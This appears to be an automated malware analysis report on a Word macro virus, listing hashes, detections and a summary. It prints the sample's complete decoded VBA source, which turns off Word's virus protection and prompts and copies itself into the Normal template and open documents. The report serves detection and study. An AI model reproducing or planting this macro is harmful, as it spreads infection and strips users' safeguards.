Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6b0627b65fc4b8fc…

MALICIOUS

Office (OLE)

Size: 33.5 KB
Created: 2000-08-23 23:48:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: bdfdc501be2cffe91103ceb9b580d53b
SHA-1: 150b0b703c1358eb0164d7ebf7822234e293f256
SHA-256: 6b0627b65fc4b8fc5d34d05bc3ae6f9392744d973c07ee63b7aa7665c4683086
Risk Score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing VBA macros. The macros appear to be designed to copy themselves between the Normal template and the active document, a technique often used for persistence or to complicate analysis. The ClamAV detection 'Doc.Trojan.Humanit-1' and the heuristic firing for VBA macros strongly indicate malicious intent, though the specific payload or ultimate goal is not directly revealed by the provided evidence.

Heuristics 2

  • ClamAV: Doc.Trojan.Humanit-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Humanit-1
  • VBA macros detected (medium, OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 953 bytes
SHA-256: c48caf3ef041a6123d823118de07c59a0466c2d6b8f604fdcb22ebcf0d0832b5
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Rem Humanitvir
cisti:
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
Set n = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
Set d = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
If n.Lines(4, 1) <> "cisti:" Then
Do Until n.CountOfLines = 0
n.DeleteLines 1, 1
Loop
For a = 1 To d.CountOfLines
n.InsertLines a, d.Lines(a, 1)
Next a
End If
If d.Lines(4, 1) <> "cisti:" Then
Do Until d.CountOfLines = 0
d.DeleteLines 1, 1
Loop
For a = 1 To n.CountOfLines
d.InsertLines a, n.Lines(a, 1)
Next a
End If
End Sub